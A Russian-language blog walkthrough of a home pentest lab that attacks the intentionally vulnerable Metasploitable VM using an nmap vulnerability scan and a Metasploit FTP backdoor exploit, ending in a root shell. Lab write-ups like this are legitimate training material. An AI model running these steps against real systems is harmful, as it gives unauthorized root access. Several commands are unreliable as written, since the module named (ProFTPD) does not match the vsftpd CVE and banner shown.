Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable

Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер

Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap

Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он -  192.168.1.131.

#Начало сканирования

Пишем в kali linux следующую компанду:

💣sudo nmap -sV -Pn --script vulners 192.168.1.131

Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.

Флаг Pn означает, что мы не отправим  ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости

Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole

Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

Exploit

И видим следующее:

192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)

* 192.168.1.131:21 - USER: 331 Please specify the password.

+ 192.168.1.131:21 - Backdoor service has been spawned, handling...

+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)

* Found shell.

* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Правила сообщества

Просьба уважать друг друга.